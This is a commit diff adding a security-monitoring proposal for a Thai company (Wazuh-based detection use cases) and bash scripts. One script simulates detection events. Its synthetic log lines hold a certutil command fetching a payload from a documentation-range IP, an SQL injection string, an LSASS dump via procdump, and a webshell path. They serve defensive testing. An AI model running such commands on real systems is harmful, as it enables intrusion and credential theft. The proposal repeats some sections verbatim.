before claude code

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

Security Detection & Threat Intelligence Enhancement Proposal-revise.md

@@ -0,0 +1,579 @@
+# Security Detection & Threat Intelligence Enhancement Proposal
+
+## Security Architecture Overview
+
+---
+
+## About Simplico Co., Ltd.
+
+**Simplico Co., Ltd.** is a technology consulting and system integration company specializing in **custom security, data, and automation solutions** for enterprise and industrial environments.
+
+We focus on designing and implementing **practical, production-ready systems** rather than generic or vendor-locked platforms. Our expertise covers security monitoring, SOC/MDR architecture, automation (SOAR), system integration, and long-term operational support.
+
+We also have experience in developing mobile applications, e‑commerce platforms, large‑scale web applications, and factory automation systems.
+
+More information about our company and services is available at: [https://simplico.net/](https://simplico.net/)
+
+## 1. Executive Summary
+
+This proposal is prepared for **บริษัท ฟู้ดโปรเจ็ค (สยาม) จำกัด (FoodProject)** and delivers advanced security detection use cases, continuously updated threat‑intelligence IOC detection, and VPN authentication anomaly monitoring using a **modular, open, and extensible security architecture**.
+
+The solution avoids monolithic or vendor‑locked SOC platforms and instead uses **best‑of‑breed components**, each responsible for a specific role: detection, automation, investigation, and escalation.
+
+**Key Outcomes**
+
+* Improved visibility into malicious network activity and credential misuse
+* Faster detection, investigation, and escalation of high‑risk security events
+* Reduced operational risk through continuously updated threat intelligence
+
+---
+
+## 2. Selected Architecture
+
+This architecture is designed to directly support the detection, automation, investigation, and escalation use cases described in Section 3 by ensuring each security function is handled by a dedicated, purpose-built component.
+
+| Layer             | Technology | Purpose                                             |
+| ----------------- | ---------- | --------------------------------------------------- |
+| Detection         | Wazuh      | Log analysis, correlation, alerting                 |
+| Automation / SOAR | Shuffle    | IOC matching, enrichment, response logic            |
+| Case Management   | DFIRTrack  | Incident tracking, evidence, investigation timeline |
+| Escalation        | PagerDuty  | On‑call alerting & SLA enforcement                  |
+
+**Why This Architecture**
+
+* Open and extensible (no vendor lock‑in)
+* Designed for real SOC / MDR workflows
+* Clear separation of responsibility
+* Easy to maintain and scale
+
+```mermaid
+flowchart LR
+    A["Firewall / DNS / IDS / VPN Logs"] --> B["Wazuh
+Detection & Correlation"]
+    B --> C["Shuffle
+Automation & SOAR"]
+    C --> D["DFIRTrack
+Incident Tracking"]
+    C --> E["PagerDuty
+On-call Escalation"]
+
+    C -->|"IOC Match / Enrichment"| D
+    C -->|"SEV-1 / SEV-2"| E
+```
+
+---
+
+## 3. Scope of Work
+
+The scope of work is organized into three primary workstreams: (1) creation and tuning of detection rules tailored to the customer environment, (2) implementation of continuously updated threat‑intelligence IOC detection across network traffic, and (3) monitoring of VPN authentication anomalies based on geographic location. Together, these workstreams ensure comprehensive visibility, timely detection, and actionable response to security threats.
+
+### 3.1 Create & Tune New Detection Rules / Use Cases
+
+**Activities**
+
+* Review firewall, DNS, IDS/IPS, VPN, and Windows log formats
+* Onboard logs into Wazuh with proper parsing and normalization
+* Implement the agreed detection use cases (see **Appendix A: Use Case List**)
+* Tune thresholds, severities, and allowlists
+* Reduce false positives using real traffic patterns
+
+**Output**
+
+* Stable, environment-specific detection rules
+* Severity-aligned alerts suitable for automation and escalation
+
+---
+
+### 3.2 Threat Intelligence IOC Detection (DNS / Firewall / IDS-IPS)
+
+**Covered Use Cases**
+
+**DNS Network Traffic**
+
+* Communication to malicious domain or IP
+* Malicious domain / IP IOC detection
+
+**IDS / IPS Network Traffic**
+
+* Communication to malicious domain or IP
+* IOC-based detection from IDS / IPS alerts
+
+**Technical Implementation**
+
+1. IOC feed integration (domain & IP)
+2. Automated, scheduled IOC updates
+3. IOC matching and enrichment via automation workflows
+4. Incident creation and evidence tracking
+5. Escalation for high-severity matches
+
+**Outcome**
+
+* Continuously updated IOC detection
+* Clear evidence trail for audit and investigation
+
+---
+
+### 3.3 VPN Authentication Success from Outside Thailand
+
+**Detection Logic**
+
+* Monitor VPN authentication success events
+* Perform GeoIP lookup on source IP
+* Detect successful logins originating outside Thailand
+
+**Enhancements**
+
+* Exception list for approved overseas users
+* Risk scoring for admin accounts, first-time country access, and off-hours login
+
+**Response**
+
+* Incident creation and tracking
+* On-call escalation for high-risk events
+
+---
+
+### 3.2 Threat Intelligence IOC Detection (DNS / Firewall / IDS‑IPS)
+
+**Covered Use Cases**
+
+**DN5S Network Traffic**
+
+* Communication to malicious domain or IP
+* Malicious domain / IP IOC detection
+
+**IDS / IPS Network Traffic**
+
+* Communication to malicious domain or IP
+* IOC‑based detection from IDS / IPS alerts
+
+**Technical Implementation**
+
+1. IOC feed integration (domain & IP)
+2. Automated, scheduled IOC updates
+3. IOC matching and enrichment via automation workflows
+4. Incident creation and evidence tracking
+5. Escalation for high‑severity matches
+
+**Outcome**
+
+* Continuously updated IOC detection
+* Clear evidence trail for audit and investigation
+
+---
+
+### 3.3 VPN Authentication Success from Outside Thailand
+
+**Detection Logic**
+
+* Monitor VPN authentication success events
+* Perform GeoIP lookup on source IP
+* Detect successful logins originating outside Thailand
+
+**Enhancements**
+
+* Exception list for approved overseas users
+* Risk scoring for admin accounts, first‑time country access, and off‑hours login
+
+**Response**
+
+* Incident creation and tracking
+* On‑call escalation for high‑risk events
+
+---
+
+## 4. End‑to‑End Workflow
+
+1. Firewall / DNS / IDS / VPN logs are collected
+2. Detection rules evaluate events
+3. Automation workflows enrich and classify alerts
+4. Incidents are tracked with evidence and timeline
+5. High‑severity events trigger on‑call escalation
+
+---
+
+## 4.1 Integration Deliverables
+
+The implementation includes full integration with the automation and case management layers to ensure alerts are actionable and traceable:
+
+* Integration with **Shuffle** for automated enrichment, IOC matching, and response workflows
+* Integration with **DFIRTrack** for incident creation, evidence collection, and investigation timeline management
+
+## 5. Deliverables
+
+* Custom detection rules and tuning
+* IOC detection workflows (DNS and IDS / IPS)
+* Automated IOC update pipeline
+* VPN geo‑anomaly detection
+* Incident templates and investigation workflow
+* Escalation logic
+* Documentation and handover
+
+---
+
+## 6. Timeline
+
+The timeline below includes all activities required for full integration across detection, automation, case management, and escalation layers, including Shuffle and DFIRTrack.
+
+| Phase                                                                  | Duration   |
+| ---------------------------------------------------------------------- | ---------- |
+| Log onboarding & review                                                | 1 week     |
+| Rule creation & tuning                                                 | 1–2 weeks  |
+| IOC pipeline & detection                                               | 1–2 weeks  |
+| VPN geo-anomaly use case                                               | 3–5 days   |
+| **Integration & end-to-end testing (Shuffle / DFIRTrack / PagerDuty)** | **1 week** |
+
+**Total estimated duration:** 5–6 weeks
+
+---
+
+## 7. Pricing
+
+**Payment Terms**
+
+* **50%** of the total project value is payable upon project commencement.
+* The remaining **50%** is payable upon project completion and acceptance, as defined in this proposal.
+
+Project completion and acceptance are defined by the successful implementation of the agreed detection use cases, verified end-to-end workflows, and delivery of documentation as outlined in the Scope of Work and Deliverables sections.
+
+Project completion and acceptance are defined by the successful implementation of the agreed detection use cases, verified end-to-end workflows, and delivery of documentation as outlined in the Scope of Work and Deliverables sections.
+ 
+
+### One‑Time Implementation
+
+| Item                             | Cost (THB) |
+| -------------------------------- | ---------- |
+| Security use‑case implementation | 320,000    |
+
+**Note:** The above price **includes full integration** with the automation, case management, and escalation layers (Shuffle, DFIRTrack, and PagerDuty), including workflow configuration, API integration, and end‑to‑end testing.
+
+**VAT Disclaimer:** All prices stated in this proposal are **exclusive of 7% Value Added Tax (VAT)**, which will be charged separately in accordance with Thai tax regulations.
+|
+
+---
+
+### Short Free Tuning Period
+
+As part of this engagement, a **short free tuning period** is included after initial deployment to ensure detection rules and thresholds are well aligned with the production environment.
+
+* Duration: **30 calendar days** after go-live
+* Delivery mode: **Online / remote support only**
+* Scope: fine-tuning of existing rules, threshold adjustments, and false-positive reduction
+* Excludes: new use-case development, new log sources, on-site support, or major logic changes
+
+This tuning period helps stabilize the system and maximize detection quality without additional cost.
+
+---
+
+### Complimentary Security Consultation
+
+In addition to the implementation, a **complimentary security consultation** is included to support knowledge transfer and strategic alignment.
+
+* Duration: **30 calendar days** (remote only)
+* Scope: architecture review, use-case clarification, and operational guidance
+* Purpose: help internal teams better understand the system and plan future improvements
+
+This consultation is advisory in nature and does not include additional implementation or configuration work.
+
+---
+
+---
+
+### Optional Ongoing Support
+
+| Service                                | Cost (THB / month) |
+| -------------------------------------- | ------------------ |
+| IOC feed maintenance & updates         | 20,000 – 40,000    |
+| Rule tuning & false‑positive reduction | Included           |
+
+---
+
+## 8. Assumptions, Exclusions & Out-of-Scope
+
+**Assumptions**
+
+* Log sources are accessible and stable
+* Required access is provided during implementation
+* Log formats do not change significantly during the project timeline
+
+**Exclusions**
+
+* 24/7 SOC monitoring
+* Incident response execution or forensic investigation
+* Advanced UEBA or machine-learning analytics
+
+**Out-of-Scope (Unless Quoted Separately)**
+
+The following items are not included in this proposal and will require a separate quotation if requested:
+
+* Major changes to log formats, vendors, or network architecture after project kickoff
+* Onboarding of additional log sources beyond firewall, DNS, IDS/IPS, and VPN
+* Development of custom dashboards beyond standard operational views
+* Unlimited rule changes or ongoing rule development beyond the initial tuning period
+* Integration with additional third-party systems not listed in this proposal
+* Emergency or after-hours support outside agreed working hours
+* Compliance certification, audit execution, or regulatory reporting
+
+---
+
+## 9. Value to Customer
+
+* Practical, actionable security detection
+* Continuously updated threat intelligence
+* Reduced alert noise
+* Clear investigation and audit trail
+* Scalable foundation for future MDR services
+
+---
+
+## 10. Closing
+
+This implementation provides enterprise-grade detection and response capability using open, well-architected components—without vendor lock-in or unnecessary complexity.
+
+---
+
+# Appendix A: Use Case List (Initial Implementation Scope)
+
+The following use cases will be implemented and tuned as part of the initial project scope. Final severity and thresholds will be confirmed during log review and tuning.
+
+## A1. DNS / Firewall (IOC)
+
+| Category | Source            | Use Case                                              | Target Severity |
+| -------- | ----------------- | ----------------------------------------------------- | --------------- |
+| DNS      | Firewall/DNS logs | DNS Network Traffic – Communicate to Malicious Domain | Medium          |
+| DNS      | Firewall/DNS logs | DNS Network Traffic – Malicious Domain IOCs Detection | Medium          |
+
+## A2. FortiGate IPS/IDS & Firewall
+
+| Category | Source    | Use Case                                                 | Target Severity |
+| -------- | --------- | -------------------------------------------------------- | --------------- |
+| IPS      | FortiGate | IPS&IDS Network Traffic – Allowed RDP from Public IPs    | High            |
+| IPS      | FortiGate | IPS&IDS Firewall Account – Admin Password Change         | High            |
+| IPS      | FortiGate | IPS&IDS Firewall Account – Create/Add Admin Account      | High            |
+| IPS      | FortiGate | IPS&IDS Firewall Configure – Disabled Email Notification | High            |
+| IPS      | FortiGate | IPS&IDS Firewall Configure – Download Configure FW       | Low             |
+| IPS      | FortiGate | IPS&IDS IDS Alert – Multiple Critical/High               | Medium          |
+| IPS      | FortiGate | IPS&IDS Network Traffic – Port Scanning                  | Low             |
+| IPS      | FortiGate | IPS&IDS Network Traffic – IOC Detection                  | Medium          |
+| IPS      | FortiGate | IPS&IDS Network Traffic – Port Scanning from Private IP  | Medium          |
+| IPS      | FortiGate | IPS&IDS Network Traffic – Communicate to Malicious IP    | Medium          |
+
+## A3. FortiGate VPN
+
+| Category | Source    | Use Case                                                         | Target Severity |
+| -------- | --------- | ---------------------------------------------------------------- | --------------- |
+| VPN      | FortiGate | VPN – Authentication Success from Guest Account                  | High            |
+| VPN      | FortiGate | VPN – Authentication Success from Multiple Country               | High            |
+| VPN      | FortiGate | VPN – Authentication Brute Force Success                         | High            |
+| VPN      | FortiGate | VPN – Authentication Multiple Fail (Many Accounts from 1 Source) | Low             |
+| VPN      | FortiGate | VPN – Authentication Success from Outside Thailand               | High            |
+
+## A4. Windows / Active Directory
+
+| Category | Source                   | Use Case                                                              | Target Severity |
+| -------- | ------------------------ | --------------------------------------------------------------------- | --------------- |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail from Privileged Account        | Medium          |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail from Service Account           | Medium          |
+| Windows  | Windows AD Logs          | Windows AD – Enumeration with Malicious Tools                         | Medium          |
+| Windows  | Windows Security Logs    | Windows Authentication – Fail from Public IPs                         | Medium          |
+| Windows  | Windows Security Logs    | Windows File Share – Enumeration to Single Destination                | Medium          |
+| Windows  | Windows Security Logs    | Windows Authentication – Success from Public IPs                      | High            |
+| Windows  | Windows Security Logs    | Windows Authentication – Privileged Account Impersonation             | High            |
+| Windows  | Windows Security Logs    | Windows Authentication – Successful Pass the Hash RDP                 | High            |
+| Windows  | Windows Security Logs    | Windows Authentication – Success from Guest Account                   | High            |
+| Windows  | Windows Security Logs    | Windows Authentication – Interactive Logon Success by Service Account | High            |
+| Windows  | Windows Security Logs    | Windows Account – Added to Privileged Custom Group                    | High            |
+| Windows  | Windows Security Logs    | Windows Account – Added to Privileged Group                           | High            |
+| Windows  | Windows Domain Configure | Windows Domain Configure – DSRM Password Reset                        | High            |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail (1 Account from Many Sources)  | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail (Many Accounts from 1 Source)  | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail from Guest Account             | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Fail (1 Account from 1 Source)      | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Multiple Interactive Logon Denied            | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Password Spray                               | Low             |
+| Windows  | Windows Security Logs    | Windows Authentication – Attempt from Disabled Account                | Low             |
+| Windows  | Windows Security Logs    | Windows Domain Account – Created                                      | Low             |
+| Windows  | Windows Security Logs    | Windows Local Account – Re-Enabled                                    | Low             |
+| Windows  | Windows Security Logs    | Windows Local Account – Created                                       | Low             |
+| Windows  | Windows Security Logs    | Windows Domain Account – Re-Enabled                                   | Low             |
+
+---
+
+# Appendix B: Additional Use Cases (Optional / Add-On Scope)
+
+The following use cases require additional log sources or integrations and are **not included in the initial implementation scope**. They can be implemented as an optional add-on or Phase 2 enhancement.
+
+## B1. VMware vCenter / ESXi
+
+| Category | Source         | Use Case                                              | Target Severity |
+| -------- | -------------- | ----------------------------------------------------- | --------------- |
+| VMware   | vCenter / ESXi | vCenter GUI – Login Failed 5 Times and Success 1 Time | High            |
+| VMware   | vCenter / ESXi | ESXi – Enable SSH on Hosts                            | Medium          |
+| VMware   | vCenter / ESXi | ESXi – SSH Failed 5 Times and Success 1 Time          | High            |
+
+## B2. Log Monitoring
+
+| Category | Source     | Use Case                          | Target Severity |
+| -------- | ---------- | --------------------------------- | --------------- |
+| SIEM     | LogMonitor | Log Monitor – Logs Loss Detection | Low             |
+
+## B3. Windows Sysmon
+
+| Category | Source  | Use Case                               | Target Severity |
+| -------- | ------- | -------------------------------------- | --------------- |
+| Sysmon   | Windows | Sysmon – LSASS Dumping                 | High            |
+| Sysmon   | Windows | Sysmon – SQL Injection                 | High            |
+| Sysmon   | Windows | Sysmon – Webshell                      | High            |
+| Sysmon   | Windows | Sysmon – Uninstall                     | High            |
+| Sysmon   | Windows | Sysmon – LSASS Dumping by Task Manager | High            |
+| Sysmon   | Windows | Sysmon – CertUtil Download             | Medium          |
+
+**Notes**
+
+* IOC-based detections require an IOC feed and update schedule. IOC matching and enrichment will be implemented via the automation layer.
+* Geo-based VPN detections require GeoIP enrichment and an exception list for approved overseas users.
+
+---
+
+# Appendix C: Future Enhancement Use Cases (Post-Implementation)
+
+The following use cases are **not included in the current project scope**. They are provided to illustrate additional high-value security capabilities that can be implemented in future phases after the initial deployment is stabilized.
+
+## C1. Impossible Travel Detection (VPN / AD / Cloud)
+
+**Description**
+
+Impossible Travel detects potential credential compromise by identifying authentication events where the same user account logs in from geographically distant locations within a time window that is physically impossible for normal human travel.
+
+**How It Works**
+
+* Correlate authentication events for the same user across VPN, Active Directory, and cloud services
+* Enrich source IP addresses with GeoIP location data
+* Calculate distance and time between consecutive login events
+* Trigger an alert when the required travel speed exceeds realistic human limits
+
+**Typical Scenarios**
+
+* VPN login from Thailand followed shortly by a VPN or cloud login from another country
+* Active Directory login from an internal office network followed by an external or overseas login
+* Cloud or SaaS login from two distant regions within a short time window
+
+**Risk & Value**
+
+* Strong indicator of stolen or shared credentials
+* High signal with low false-positive rate when properly tuned
+* Effective for detecting attacks that bypass malware-based controls
+
+**Response Examples**
+
+* Create an incident record for investigation
+* Enrich with user role, account type, and asset criticality
+* Optional actions such as password reset, MFA enforcement, or account lockout
+
+**Implementation Notes
+
+* Known VPN exit IPs and office locations are allowlisted to reduce false positives
+* Service and automation accounts are excluded by default
+* Time windows and thresholds are tuned based on operational patterns
+
+---
+
+## C2. Advanced Credential Abuse & Privilege Misuse
+
+**Example Use Cases**
+
+* Privileged account usage outside business hours
+* Dormant accounts becoming active unexpectedly
+* Service accounts used for interactive logon
+* Rapid privilege escalation followed by sensitive access
+
+**Value**
+
+* Detects early-stage attacker activity
+* High audit and compliance relevance
+* Low operational noise when tuned correctly
+
+---
+
+## C3. Lateral Movement & Internal Reconnaissance
+
+**Example Use Cases**
+
+* Multiple authentication successes across different hosts in a short time
+* SMB or RDP access patterns indicating lateral movement
+* Admin account accessing many servers rapidly
+* Internal scanning or enumeration behavior
+
+**Value**
+
+* Identifies attacker movement after initial compromise
+* Difficult to detect without correlation
+* Strong indicator of real intrusion activity
+
+---
+
+## C4. Ransomware Early Warning Indicators
+
+**Example Use Cases**
+
+* Mass file rename or encryption behavior
+* Shadow copy deletion
+* Backup or recovery service stopped unexpectedly
+* High-risk process execution prior to file access
+
+**Value**
+
+* Detects ransomware before full impact
+* High business risk reduction
+* Strong executive-level interest
+
+---
+
+## C5. Endpoint & Server Behavior Anomalies
+
+**Example Use Cases**
+
+* Unusual process execution on critical servers
+* Command-line anomaly detection
+* Creation of scheduled tasks or persistence mechanisms
+* Unexpected software installation
+
+**Value**
+
+* Complements EDR detections
+* Detects living-off-the-land techniques
+* Useful for threat hunting and incident investigation
+
+---
+
+## C6. Cloud & SaaS Security Monitoring (If Applicable)
+
+**Example Use Cases**
+
+* Cloud administrator role changes
+* API key misuse or abnormal API usage
+* Suspicious SaaS login behavior
+* Large or unusual data download activity
+
+**Value**
+
+* Extends visibility beyond on-prem systems
+* Important for hybrid and cloud environments
+* Often required by security audits
+
+---
+
+## C7. SOC & Operational Maturity Monitoring
+
+**Example Use Cases**
+
+* Alert fatigue and recurring alert patterns
+* Incidents exceeding SLA targets
+* Detection coverage gaps
+* Log ingestion health and drift detection
+
+**Value**
+
+* Improves SOC efficiency and effectiveness
+* Provides management-level insight
+* Supports continuous security improvement

scripts/README.md

@@ -181,6 +181,41 @@ Environment overrides:
 - `WIN_HOST`, `DNS_HOST`
 - `SIM_VPN_USER`
 
+## Simulate Appendix B logs (revise proposal)
+
+Use this to generate synthetic logs for Appendix B (B1-B3) in:
+`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
+
+```bash
+scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
+```
+
+Optional flag:
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
+
+Selectors:
+- `all` (all Appendix B use cases)
+- `b1`, `b2`, `b3` (by section)
+- specific use case id, e.g. `B1-01`, `B2-01`, `B3-06`
+
+Examples:
+
+```bash
+scripts/send-wazuh-proposal-appendix-b-events.sh all 1
+scripts/send-wazuh-proposal-appendix-b-events.sh b3 2 0.5
+scripts/send-wazuh-proposal-appendix-b-events.sh B3-06 1
+DRY_RUN=1 scripts/send-wazuh-proposal-appendix-b-events.sh all 1
+scripts/send-wazuh-proposal-appendix-b-events.sh b1 1 2 --forever
+```
+
+Environment overrides:
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
+- `WAZUH_SYSLOG_PORT` (default `514`)
+- `EVENT_DELAY` (default `0.05`)
+- `DRY_RUN` (default `0`, set `1` to print only)
+- `VCENTER_HOST`, `ESXI_HOST`, `LOGMON_HOST`, `WIN_SYSMON_HOST`
+- `SIM_USER`
+
 ## Simulate endpoint client-agent logs (Windows / macOS / Linux)
 
 Use this to inject realistic endpoint telemetry for client agents into Wazuh.
@@ -247,3 +282,28 @@ SHUFFLE_API_KEY=<your_key> scripts/create-shuffle-mvp-workflows.sh
 This creates:
 - `MVP - IOC Enrichment and Case Routing`
 - `MVP - VPN Geo Anomaly Triage`
+
+## Import Wazuh Dashboard (FortiGate Simulation)
+
+Prebuilt saved objects file:
+
+- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
+
+Import helper:
+
+```bash
+scripts/import-wazuh-dashboard.sh
+```
+
+Optional overrides:
+
+```bash
+WAZUH_DASHBOARD_URL=https://localhost \
+WAZUH_DASHBOARD_USER=admin \
+WAZUH_DASHBOARD_PASS=SecretPassword \
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-fortigate-sim-dashboard.ndjson
+```
+
+After import, open dashboard:
+
+- `SOC FortiGate Simulation Overview`

scripts/import-wazuh-dashboard.sh

@@ -0,0 +1,27 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+DASHBOARD_FILE="${1:-scripts/events/wazuh-fortigate-sim-dashboard.ndjson}"
+WAZUH_DASHBOARD_URL="${WAZUH_DASHBOARD_URL:-https://localhost}"
+WAZUH_DASHBOARD_USER="${WAZUH_DASHBOARD_USER:-admin}"
+WAZUH_DASHBOARD_PASS="${WAZUH_DASHBOARD_PASS:-SecretPassword}"
+OVERWRITE="${OVERWRITE:-true}"
+
+if [[ ! -f "${DASHBOARD_FILE}" ]]; then
+  echo "error: dashboard file not found: ${DASHBOARD_FILE}" >&2
+  exit 1
+fi
+
+endpoint="${WAZUH_DASHBOARD_URL%/}/api/saved_objects/_import?overwrite=${OVERWRITE}"
+
+echo "Importing dashboard from ${DASHBOARD_FILE}"
+echo "Target: ${endpoint}"
+
+curl -sS -k -u "${WAZUH_DASHBOARD_USER}:${WAZUH_DASHBOARD_PASS}" \
+  -H 'osd-xsrf: true' \
+  -F "file=@${DASHBOARD_FILE}" \
+  "${endpoint}"
+
+echo
+
+echo "Done. Open Wazuh Dashboard and search for: SOC FortiGate Simulation Overview"

scripts/send-wazuh-proposal-appendix-b-events.sh

@@ -0,0 +1,215 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Usage:
+#   scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
+#
+# selector:
+#   all | b1 | b2 | b3 | <usecase_id>
+#   example usecase_id: B1-01, B2-01, B3-06
+
+SELECTOR="${1:-all}"
+COUNT="${2:-1}"
+DELAY="${3:-0.3}"
+EVENT_DELAY="${EVENT_DELAY:-0.05}"
+DRY_RUN="${DRY_RUN:-0}"
+FOREVER="false"
+
+for arg in "${@:4}"; do
+  case "${arg}" in
+    --forever)
+      FOREVER="true"
+      ;;
+    *)
+      echo "error: unexpected argument '${arg}'"
+      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever]"
+      exit 1
+      ;;
+  esac
+done
+
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
+
+VCENTER_HOST="${VCENTER_HOST:-vcenter-01}"
+ESXI_HOST="${ESXI_HOST:-esxi-01}"
+LOGMON_HOST="${LOGMON_HOST:-logmon-01}"
+WIN_SYSMON_HOST="${WIN_SYSMON_HOST:-win-sysmon-01}"
+SIM_USER="${SIM_USER:-jane.doe}"
+
+if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
+  echo "error: count must be a positive integer"
+  exit 1
+fi
+
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay must be numeric"
+  exit 1
+fi
+
+if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: EVENT_DELAY must be numeric"
+  exit 1
+fi
+
+rand_public_ip() {
+  if [[ $((RANDOM % 2)) -eq 0 ]]; then
+    echo "198.51.100.$((RANDOM % 240 + 10))"
+  else
+    echo "203.0.113.$((RANDOM % 240 + 10))"
+  fi
+}
+
+emit_syslog() {
+  local msg="$1"
+  local sent="false"
+
+  if [[ "${DRY_RUN}" == "1" ]]; then
+    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
+    return 0
+  fi
+
+  if command -v nc >/dev/null 2>&1; then
+    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+    return 1
+  fi
+
+  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
+}
+
+selector_matches() {
+  local id="$1"
+  local section="$2"
+  local sel
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
+  local idl
+  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
+  local sec
+  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
+
+  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
+}
+
+emit_b_usecase() {
+  local id="$1"
+  local section="$2"
+  local severity="$3"
+  local source="$4"
+  local host="$5"
+  local usecase="$6"
+  local body="$7"
+
+  selector_matches "${id}" "${section}" || return 0
+
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  sleep "${EVENT_DELAY}"
+}
+
+emit_b1() {
+  local sip
+  sip="$(rand_public_ip)"
+
+  emit_b_usecase "B1-01" "B1" "high" "vmware" "${VCENTER_HOST}" \
+    "vCenter GUI Login Failed 5 Times and Success 1 Time" \
+    "event_type=vmware_vcenter_login_fail_success login_fail_count=5 login_success_count=1 user=\"${SIM_USER}\" src_ip=${sip}"
+
+  emit_b_usecase "B1-02" "B1" "medium" "vmware" "${ESXI_HOST}" \
+    "ESXi Enable SSH on Hosts" \
+    "event_type=vmware_esxi_enable_ssh action=enable service=ssh user=\"root\" host=\"${ESXI_HOST}\""
+
+  emit_b_usecase "B1-03" "B1" "high" "vmware" "${ESXI_HOST}" \
+    "ESXi SSH Failed 5 Times and Success 1 Time" \
+    "event_type=vmware_esxi_ssh_fail_success ssh_fail_count=5 ssh_success_count=1 user=\"root\" src_ip=${sip}"
+}
+
+emit_b2() {
+  emit_b_usecase "B2-01" "B2" "low" "log_monitor" "${LOGMON_HOST}" \
+    "Log Monitor Logs Loss Detection" \
+    "event_type=log_loss_detection missing_stream=firewall expected_eps=500 observed_eps=0 duration_seconds=180"
+}
+
+emit_b3() {
+  emit_b_usecase "B3-01" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon LSASS Dumping" \
+    "event_type=sysmon_lsass_dump event_id=10 process=procdump.exe target_process=lsass.exe user=\"${SIM_USER}\""
+
+  emit_b_usecase "B3-02" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon SQL Injection" \
+    "event_type=sysmon_sql_injection event_id=1 process=w3wp.exe url=\"/app/login.php?id=1%27%20OR%201=1--\""
+
+  emit_b_usecase "B3-03" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon Webshell" \
+    "event_type=sysmon_webshell event_id=11 file=\"C:\\\\inetpub\\\\wwwroot\\\\shell.aspx\" process=w3wp.exe"
+
+  emit_b_usecase "B3-04" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon Uninstall" \
+    "event_type=sysmon_security_agent_uninstall event_id=1 process=msiexec.exe cmdline=\"msiexec /x security-agent\" user=\"${SIM_USER}\""
+
+  emit_b_usecase "B3-05" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon LSASS Dumping by Task Manager" \
+    "event_type=sysmon_lsass_dump_taskmgr event_id=10 process=taskmgr.exe target_process=lsass.exe action=create_dump"
+
+  emit_b_usecase "B3-06" "B3" "medium" "windows_sysmon" "${WIN_SYSMON_HOST}" \
+    "Sysmon CertUtil Download" \
+    "event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\""
+}
+
+emit_selected_set() {
+  local sel
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
+
+  case "${sel}" in
+    all)
+      emit_b1
+      emit_b2
+      emit_b3
+      ;;
+    b1|b1-*)
+      emit_b1
+      ;;
+    b2|b2-*)
+      emit_b2
+      ;;
+    b3|b3-*)
+      emit_b3
+      ;;
+    *)
+      emit_b1
+      emit_b2
+      emit_b3
+      ;;
+  esac
+}
+
+echo "starting proposal Appendix B log simulator"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+
+if [[ "${FOREVER}" == "true" ]]; then
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
+  trap 'echo; echo "stopped"; exit 0' INT TERM
+  while true; do
+    emit_selected_set
+    sleep "${DELAY}"
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    emit_selected_set
+    if [[ "${i}" -lt "${COUNT}" ]]; then
+      sleep "${DELAY}"
+    fi
+  done
+  echo "done"
+fi